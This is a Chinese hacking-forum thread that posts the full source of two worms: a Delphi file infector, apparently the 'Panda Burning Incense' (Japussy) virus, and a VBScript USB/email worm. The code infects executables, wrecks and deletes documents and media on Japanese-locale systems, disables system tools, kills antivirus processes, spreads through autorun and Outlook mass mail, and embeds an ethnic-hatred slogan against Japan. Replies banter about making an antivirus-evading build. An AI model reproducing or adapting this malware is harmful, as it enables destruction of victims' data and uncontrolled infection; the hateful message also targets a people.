返回列表 发帖

熊猫烧香的病毒代码

  1. program Japussy;
  2. uses
  3. Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
  4. const
  5. HeaderSize = 82432; //病毒体的大小
  6. IconOffset = $12EB8; //PE文件主图标的偏移量

  7. //在Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
  8. //查找2800000020的十六进制字符串可以找到主图标的偏移量

  9. {
  10. HeaderSize = 38912; //Upx压缩过病毒体的大小
  11. IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

  12. //Upx 1.24W 用法: upx -9 --8086 Japussy.exe
  13. }
  14. IconSize = $2E8; //PE文件主图标的大小--744字节
  15. IconTail = IconOffset + IconSize; //PE文件主图标的尾部
  16. ID = $44444444; //感染标记

  17. //垃圾码,以备写入
  18. Catchword = 'If a race need to be killed out, it must be Yamato. ' +
  19. 'If a country need to be destroyed, it must be Japan! ' +
  20. '*** W32.Japussy.Worm.A ***';
  21. {$R *.RES}
  22. function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
  23. stdcall; external 'Kernel32.dll'; //函数声明
  24. var
  25. TmpFile: string;
  26. Si: STARTUPINFO;
  27. Pi: PROCESS_INFORMATION;
  28. IsJap: Boolean = False; //日文操作系统标记
  29. { 判断是否为Win9x }
  30. function IsWin9x: Boolean;
  31. var
  32. Ver: TOSVersionInfo;
  33. begin
  34. Result := False;
  35. Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  36. if not GetVersionEx(Ver) then
  37. Exit;
  38. if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
  39. Result := True;
  40. end;
  41. { 在流之间复制 }
  42. procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  43. dStartPos: Integer; Count: Integer);
  44. var
  45. sCurPos, dCurPos: Integer;
  46. begin
  47. sCurPos := Src.Position;
  48. dCurPos := Dst.Position;
  49. Src.Seek(sStartPos, 0);
  50. Dst.Seek(dStartPos, 0);
  51. Dst.CopyFrom(Src, Count);
  52. Src.Seek(sCurPos, 0);
  53. Dst.Seek(dCurPos, 0);
  54. end;
  55. { 将宿主文件从已感染的PE文件中分离出来,以备使用 }
  56. procedure ExtractFile(FileName: string);
  57. var
  58. sStream, dStream: TFileStream;
  59. begin
  60. try
  61. sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  62. try
  63. dStream := TFileStream.Create(FileName, fmCreate);
  64. try
  65. sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
  66. dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
  67. finally
  68. dStream.Free;
  69. end;
  70. finally
  71. sStream.Free;
  72. end;
  73. except
  74. end;
  75. end;
  76. { 填充STARTUPINFO结构 }
  77. procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
  78. begin
  79. Si.cb := SizeOf(Si);
  80. Si.lpReserved := nil;
  81. Si.lpDesktop := nil;
  82. Si.lpTitle := nil;
  83. Si.dwFlags := STARTF_USESHOWWINDOW;
  84. Si.wShowWindow := State;
  85. Si.cbReserved2 := 0;
  86. Si.lpReserved2 := nil;
  87. end;
  88. { 发带毒邮件 }
  89. procedure SendMail;
  90. begin
  91. //哪位仁兄愿意完成之?
  92. end;
  93. { 感染PE文件 }
  94. procedure InfectOneFile(FileName: string);
  95. var
  96. HdrStream, SrcStream: TFileStream;
  97. IcoStream, DstStream: TMemoryStream;
  98. iID: LongInt;
  99. aIcon: TIcon;
  100. Infected, IsPE: Boolean;
  101. i: Integer;
  102. Buf: array[0..1] of Char;
  103. begin
  104. try //出错则文件正在被使用,退出
  105. if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
  106. Exit;
  107. Infected := False;
  108. IsPE := False;
  109. SrcStream := TFileStream.Create(FileName, fmOpenRead);
  110. try
  111. for i := 0 to $108 do //检查PE文件头
  112. begin
  113. SrcStream.Seek(i, soFromBeginning);
  114. SrcStream.Read(Buf, 2);
  115. if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
  116. begin
  117. IsPE := True; //是PE文件
  118. Break;
  119. end;
  120. end;
  121. SrcStream.Seek(-4, soFromEnd); //检查感染标记
  122. SrcStream.Read(iID, 4);
  123. if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
  124. Infected := True;
  125. finally
  126. SrcStream.Free;
  127. end;
  128. if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
  129. Exit;
  130. IcoStream := TMemoryStream.Create;
  131. DstStream := TMemoryStream.Create;
  132. try
  133. aIcon := TIcon.Create;
  134. try
  135. //得到被感染文件的主图标(744字节),存入流
  136. aIcon.ReleaseHandle;
  137. aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
  138. aIcon.SaveToStream(IcoStream);
  139. finally
  140. aIcon.Free;
  141. end;
  142. SrcStream := TFileStream.Create(FileName, fmOpenRead);
  143. //头文件
  144. HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  145. try
  146. //写入病毒体主图标之前的数据
  147. CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
  148. //写入目前程序的主图标
  149. CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
  150. //写入病毒体主图标到病毒体尾部之间的数据
  151. CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
  152. //写入宿主程序
  153. CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
  154. //写入已感染的标记
  155. DstStream.Seek(0, 2);
  156. iID := $44444444;
  157. DstStream.Write(iID, 4);
  158. finally
  159. HdrStream.Free;
  160. end;
  161. finally
  162. SrcStream.Free;
  163. IcoStream.Free;
  164. DstStream.SaveToFile(FileName); //替换宿主文件
  165. DstStream.Free;
  166. end;
  167. except;
  168. end;
  169. end;

  170. { 将目标文件写入垃圾码后删除 }
  171. procedure SmashFile(FileName: string);
  172. var
  173. FileHandle: Integer;
  174. i, Size, Mass, Max, Len: Integer;
  175. begin
  176. try
  177. SetFileAttributes(PChar(FileName), 0); //去掉只读属性
  178. FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
  179. try
  180. Size := GetFileSize(FileHandle, nil); //文件大小
  181. i := 0;
  182. Randomize;
  183. Max := Random(15); //写入垃圾码的随机次数
  184. if Max < 5 then
  185. Max := 5;
  186. Mass := Size div Max; //每个间隔块的大小
  187. Len := Length(Catchword);
  188. while i < Max do
  189. begin
  190. FileSeek(FileHandle, i * Mass, 0); //定位
  191. //写入垃圾码,将文件彻底破坏掉
  192. FileWrite(FileHandle, Catchword, Len);
  193. Inc(i);
  194. end;
  195. finally
  196. FileClose(FileHandle); //关闭文件
  197. end;
  198. DeleteFile(PChar(FileName)); //删除之
  199. except
  200. end;
  201. end;
  202. { 获得可写的驱动器列表 }
  203. function GetDrives: string;
  204. var
  205. DiskType: Word;
  206. D: Char;
  207. Str: string;
  208. i: Integer;
  209. begin
  210. for i := 0 to 25 do //遍历26个字母
  211. begin
  212. D := Chr(i + 65);
  213. Str := D + ':';
  214. DiskType := GetDriveType(PChar(Str));
  215. //得到本地磁盘和网络盘
  216. if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
  217. Result := Result + D;
  218. end;
  219. end;
  220. { 遍历目录,感染和摧毁文件 }
  221. procedure LoopFiles(Path, Mask: string);
  222. var
  223. i, Count: Integer;
  224. Fn, Ext: string;
  225. SubDir: TStrings;
  226. SearchRec: TSearchRec;
  227. Msg: TMsg;
  228. function IsValidDir(SearchRec: TSearchRec): Integer;
  229. begin
  230. if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
  231. (SearchRec.Name <> '..') then
  232. Result := 0 //不是目录
  233. else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
  234. (SearchRec.Name <> '..') then
  235. Result := 1 //不是根目录
  236. else Result := 2; //是根目录
  237. end;
  238. begin
  239. if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
  240. begin
  241. repeat
  242. PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
  243. if IsValidDir(SearchRec) = 0 then
  244. begin
  245. Fn := Path + SearchRec.Name;
  246. Ext := UpperCase(ExtractFileExt(Fn));
  247. if (Ext = '.EXE') or (Ext = '.SCR') then
  248. begin
  249. InfectOneFile(Fn); //感染可执行文件
  250. end
  251. else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
  252. begin
  253. //感染HTML和ASP文件,将Base64编码后的病毒写入
  254. //感染浏览此网页的所有用户

  255. end
  256. else if Ext = '.WAB' then //Outlook地址簿文件
  257. begin
  258. //获取Outlook邮件地址
  259. end
  260. else if Ext = '.ADC' then //Foxmail地址自动完成文件
  261. begin
  262. //获取Foxmail邮件地址
  263. end
  264. else if Ext = 'IND' then //Foxmail地址簿文件
  265. begin
  266. //获取Foxmail邮件地址
  267. end
  268. else
  269. begin
  270. if IsJap then //是倭文操作系统
  271. begin
  272. if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
  273. (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
  274. (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
  275. (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
  276. (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
  277. (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
  278. SmashFile(Fn); //摧毁文件
  279. end;
  280. end;
  281. end;
  282. //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
  283. Sleep(200);
  284. until (FindNext(SearchRec) <> 0);
  285. end;
  286. FindClose(SearchRec);
  287. SubDir := TStringList.Create;
  288. if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
  289. begin
  290. repeat
  291. if IsValidDir(SearchRec) = 1 then
  292. SubDir.Add(SearchRec.Name);
  293. until (FindNext(SearchRec) <> 0);
  294. end;
  295. FindClose(SearchRec);
  296. Count := SubDir.Count - 1;
  297. for i := 0 to Count do
  298. LoopFiles(Path + SubDir.Strings + '', Mask);
  299. FreeAndNil(SubDir);
  300. end;
  301. { 遍历磁盘上所有的文件 }
  302. procedure InfectFiles;

  303. var
  304. DriverList: string;
  305. i, Len: Integer;
  306. begin
  307. if GetACP = 932 then //日文操作系统
  308. IsJap := True; //去死吧!
  309. DriverList := GetDrives; //得到可写的磁盘列表
  310. Len := Length(DriverList);
  311. while True do //死循环
  312. begin
  313. for i := Len downto 1 do //遍历每个磁盘驱动器
  314. LoopFiles(DriverList + ':', '*.*'); //感染之
  315. SendMail; //发带毒邮件
  316. Sleep(1000 * 60 * 5); //睡眠5分钟
  317. end;
  318. end;
  319. { 主程序开始 }
  320. begin
  321. if IsWin9x then //是Win9x
  322. RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
  323. else //WinNT
  324. begin
  325. //远程线程映射到Explorer进程
  326. //哪位兄台愿意完成之?
  327. end;
  328. //如果是原始病毒体自己
  329. if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
  330. InfectFiles //感染和发邮件
  331. else //已寄生于宿主程序上了,开始工作
  332. begin
  333. TmpFile := ParamStr(0); //创建临时文件
  334. Delete(TmpFile, Length(TmpFile) - 4, 4);
  335. TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
  336. ExtractFile(TmpFile); //分离之
  337. FillStartupInfo(Si, SW_SHOWDEFAULT);
  338. CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
  339. 0, nil, '.', Si, Pi); //创建新进程运行之
  340. InfectFiles; //感染和发邮件
  341. end;
  342. end.
复制代码
Aim、Ambition、Action Security Team

Just For the Security . . . . . . .

The way to hacking. . . ■■■■■98%

VBS代码

  1. dim fso,wsh,myfile,ws,pp,fsoFolder
  2. set wsh=w.createobject("w.shell")
  3. set fso=w.createobject("ing.filesystemobject")
  4. set myfile=fso.GetFile(w.fullname)
  5. '修改注册表(开始菜单里面的东西和IE各项设置)
  6. wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
  7. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
  8. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
  9. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
  10. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
  11. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
  12. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
  13. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
  14. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
  15. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
  16. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
  17. wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://baidu.com"
  18. wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://baidu.com"
  19. wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://baidu.com"
  20. wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://baidu.com"
  21. wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://baidu.com"
  22. wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://baidu.com"
  23. wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://baidu.com"
  24. wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://baidu.com"
  25. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
  26. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
  27. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
  28. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
  29. wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubions",1,"REG_DWORD"
  30. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
  31. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
  32. wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
  33. wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
  34. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
  35. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
  36. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
  37. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
  38. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
  39. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
  40. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
  41. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
  42. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
  43. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
  44. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
  45. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
  46. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
  47. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
  48. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
  49. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
  50. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
  51. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
  52. wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
  53. '使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
  54. wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
  55. wsh.Regwrite "HKCR\Drive\shell\","auto"
  56. wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
  57. wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
  58. wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
  59. wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
  60. '修改默认文件图标,这里可以换成可爱的熊猫哦,(修改dll也可以实现,只是有点难)
  61. wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
  62. wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
  63. wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
  64. wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
  65. wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
  66. wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
  67. wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
  68. wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
  69. wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
  70. wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
  71. wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
  72. wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,狂野少年和你开个小小的玩笑"
  73. wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒"
  74. '复制自身到C,D,E,F,U盘
  75. myfile.copy "c:\"
  76. myfile.copy "D:\"
  77. myfile.copy "E:\"
  78. myfile.copy "F:\"
  79. myfile.copy "I:\"
  80. myfile.attributes=34
  81. '定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写哦^_^
  82. If fso.FileExists("C:\autorun.inf") Then
  83. Set objFolder = fso.GetFile("C:\autorun.inf")
  84. Else
  85. wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_
  86. &"&& echo open=NYboy.bat >>C:\autorun.inf"_
  87. &"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_
  88. &"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_
  89. &"&& echo shell=Auto>>C:\autorun.inf"_
  90. &"&& attrib +h +s +r C:\autorun.inf" ,0
  91. set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
  92. autobatc.writeline("NYboy.vbs")
  93. End If
  94. If fso.FileExists("D:\autorun.inf") Then
  95. Set objFolder = fso.GetFile("D:\autorun.inf")
  96. Else
  97. wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_
  98. &"&& echo open=NYboy.bat >>D:\autorun.inf"_
  99. &"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_
  100. &"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_
  101. &"&& echo shell=Auto>>D:\autorun.inf"_
  102. &"&& attrib +h +s +r D:\autorun.inf" ,0
  103. set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
  104. autobatd.writeline("NYboy.vbs")
  105. End If
  106. If fso.FileExists("E:\autorun.inf") Then
  107. Set objFolder = fso.GetFile("E:\autorun.inf")
  108. Else
  109. wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_
  110. &"&& echo open=NYboy.bat >>E:\autorun.inf"_
  111. &"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_
  112. &"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_
  113. &"&& echo shell=Auto>>E:\autorun.inf"_
  114. &"&& attrib +h +s +r E:\autorun.inf" ,0
  115. set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
  116. autobate.writeline("NYboy.vbs")
  117. End If
  118. If fso.FileExists("F:\autorun.inf") Then
  119. Set objFolder = fso.GetFile("F:\autorun.inf")
  120. Else
  121. wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_
  122. &"&& echo open=NYboy.bat >>F:\autorun.inf"_
  123. &"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_
  124. &"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_
  125. &"&& echo shell=Auto>>F:\autorun.inf"_
  126. &"&& attrib +h +s +r F:\autorun.inf" ,0
  127. set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
  128. autobatf.writeline("NYboy.vbs")
  129. End If
  130. If fso.FileExists("I:\autorun.inf") Then
  131. Set objFolder = fso.GetFile("I:\autorun.inf")
  132. Else
  133. wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_
  134. &"&& echo open=NYboy.bat >>I:\autorun.inf"_
  135. &"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_
  136. &"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_
  137. &"&& echo shell=Auto>>I:\autorun.inf"_
  138. &"&& attrib +h +s +r I:\autorun.inf" ,0
  139. set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
  140. autobatf.writeline("NYboy.vbs")
  141. End If
  142. '设置病毒体属性为 系统 只读 隐藏
  143. wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
  144. &"&& attrib +h +s +r D:\NYboy.bat"_
  145. &"&& attrib +h +s +r E:\NYboy.bat"_
  146. &"&& attrib +h +s +r F:\NYboy.bat"_
  147. &"&& attrib +h +s +r I:\NYboy.bat",0
  148. '强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
  149. do
  150. set ws=getobject("winmgmts:\\.\root\cimv2")
  151. set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
  152. for each i in pp
  153. i.terminate()
  154. w.sleep 100
  155. next
  156. loop
  157. '删除你讨厌的镜像goh文件
  158. set ps=ws.ExecQuery("select * from CIM_DATAFILE where Extension='GHO' or Extension='gho'or extension='exe'")
  159. for each p in ps
  160. p.delete
  161. next
  162. '使病毒可以靠邮件传播
  163. Set ol=CreateObject("Outlook.Application")
  164. On Error Resume Next
  165. For x=1 To 5
  166. Set Mail=ol.CreateItem(0)
  167. Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
  168. Mail.Subject="今晚你来吗?"
  169. Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! "
  170. Mail.Attachments.Add("c:\NYboy.vbs")
  171. Mail.Send
  172. Next
  173. ol.Quit
复制代码
Aim、Ambition、Action Security Team

Just For the Security . . . . . . .

The way to hacking. . . ■■■■■98%

TOP

厉害啊@

简直服了!你们了!
喜欢网络!

TOP

看过!,,  不怎么懂!

  不知道你们还有没有这个毒! 我想中中   !!

TOP

你想中啊?、叫3ast做个免杀的给你试试啊。。。hoho
花前月下,不如花钱“日”下~~~

TOP

原帖由 hilarylove 于 2008-11-27 11:26 发表
你想中啊?、叫3ast做个免杀的给你试试啊。。。hoho



  那我喜欢! 呵呵!

     应该自己想办法把它给杀了!  不错哦!!

TOP

是用C语言写的还是C++写的哦。很复杂啊。
爱我所爱

TOP

返回列表